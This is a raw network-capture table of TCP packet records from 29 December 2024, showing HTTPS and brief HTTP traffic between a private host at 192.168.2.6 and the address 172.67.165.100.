Dec 29, 2024 04:24:26.315459967 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.315466881 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.315510035 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.315521955 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.316385984 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.316451073 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.320578098 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.320647955 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.320652962 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.320693970 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.324899912 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.324934006 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.324969053 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.324974060 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.324997902 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.325017929 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.330065012 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.330096006 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.330127954 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.330133915 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.330180883 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.330194950 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.331178904 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.331271887 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.335292101 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.335335016 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.335361958 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.335367918 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.335377932 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.335410118 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.339546919 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.339577913 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.339611053 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.339617014 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.339637041 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.339656115 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.342708111 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.342791080 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.344726086 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.344784021 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.349535942 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.349567890 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.349601984 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.349610090 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.349618912 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.349649906 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.354687929 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.354718924 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.354846001 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.354851961 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.354952097 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.359905005 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.359937906 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.359970093 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.359973907 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.360001087 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.360024929 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.489366055 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.489411116 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.489456892 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.489475012 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.489504099 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.489511967 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.491497040 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.491555929 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.493403912 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.493457079 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.494482040 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.494543076 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.519898891 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.519929886 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.519979954 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.519985914 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.519999027 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.520032883 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.525038004 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.525072098 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.525103092 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.525108099 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.525134087 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.525146008 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.530267954 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.530301094 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.530332088 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.530338049 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.530354977 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.530376911 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.532469988 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.532530069 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.535499096 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.535595894 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.539779902 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.539815903 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.539855003 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.539861917 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.539891005 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.539906025 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.540750027 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.540810108 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.543915033 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.543976068 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.545008898 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.545057058 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.549813032 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.549844980 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.549874067 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.549877882 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.549890041 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.549913883 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.555039883 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.555067062 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.555120945 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.555125952 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.555155993 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.555167913 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.559122086 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.559189081 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.559192896 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.559242010 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.560143948 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.560198069 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.563297033 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.563366890 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.690022945 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.690164089 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.694492102 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.694530010 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.694680929 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.694686890 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.694751024 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.720093966 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.720133066 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.720220089 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.720226049 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.720350981 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.720988035 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.721079111 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.725311041 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.725343943 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.725425005 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.725429058 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.725501060 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.730473995 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.730505943 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.730568886 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.730619907 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.730629921 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.730720997 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.734759092 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.734858990 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.734863043 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.734930038 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.739907026 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.739957094 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.739991903 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.739996910 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.740021944 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.740041018 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.745176077 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.745206118 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.745240927 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.745246887 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.745270014 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.745273113 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.745292902 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.745322943 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.745666981 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.745681047 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.798058033 CET	49740	80	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.917567015 CET	80	49740	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:26.917808056 CET	49740	80	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:26.917993069 CET	49740	80	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:27.037431002 CET	80	49740	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:28.111507893 CET	80	49740	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:28.111567020 CET	49740	80	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:28.112520933 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:28.112540007 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:28.112601995 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:28.112998962 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:28.113012075 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:29.322448969 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:29.322530031 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:29.323115110 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:29.323126078 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:29.331568956 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:29.331574917 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:29.774431944 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:29.774472952 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:29.774517059 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:29.774563074 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:29.774590015 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:29.774605989 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:29.774605989 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:29.774605989 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:29.774631977 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:29.774648905 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:29.774682999 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:29.782738924 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:29.782805920 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:29.782859087 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:29.782902956 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:29.791213036 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:29.791280031 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:29.799063921 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:29.799124956 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:29.799190044 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:29.799236059 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:29.893923998 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:29.893990993 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:29.894025087 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:29.894068956 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:29.966191053 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:29.966252089 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:29.970005989 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:29.970066071 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:29.970118046 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:29.970160961 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:29.977798939 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:29.977844000 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:29.980782032 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:29.980839014 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:29.980923891 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:29.980963945 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:29.988861084 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:29.988909006 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:29.996364117 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:29.996412039 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:29.996453047 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:29.996501923 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.004133940 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.004177094 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.004237890 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.004281998 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.011917114 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.011965990 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.011974096 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.012013912 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.012021065 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.012058973 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.019687891 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.019843102 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.019853115 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.019896030 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.027476072 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.027539015 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.035233974 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.035279036 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.035342932 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.035386086 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.042208910 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.042256117 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.042308092 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.042346001 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.049186945 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.049232960 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.049285889 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.049325943 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.056204081 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.056271076 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.056422949 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.056468010 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.158098936 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.158155918 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.158247948 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.158298016 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.160573006 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.160624981 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.160686970 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.160737038 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.170591116 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.170650959 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.180118084 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.180179119 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.184734106 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.184788942 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.193639994 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.193702936 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.202068090 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.202162027 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.210467100 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.210532904 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.214801073 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.214884996 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.223469973 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.223541021 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.231626034 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.231688976 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.240046978 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.240108013 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.244304895 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.244358063 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.252770901 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.252846003 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.257016897 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.257091999 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.277751923 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.277906895 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.350311995 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.350392103 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.355146885 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.355216980 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.361809015 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.361881971 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.365190983 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.365256071 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.371383905 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.371450901 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.374521017 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.374589920 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.380440950 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.380501032 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.385996103 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.386053085 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.391637087 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.391710997 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.394546032 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.394609928 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.400120974 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.400178909 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.405642986 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.405705929 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.407394886 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.407457113 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.410556078 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.410619974 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.413115025 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.413175106 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.416286945 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.416354895 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.418049097 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.418111086 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.421314001 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.421390057 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.424518108 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.424576998 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.427809000 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.427867889 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.429538965 CET	443	49746	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:30.429594994 CET	49746	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:30.432729959 CET	443	49746	172.67.165.100	192.168.2.6
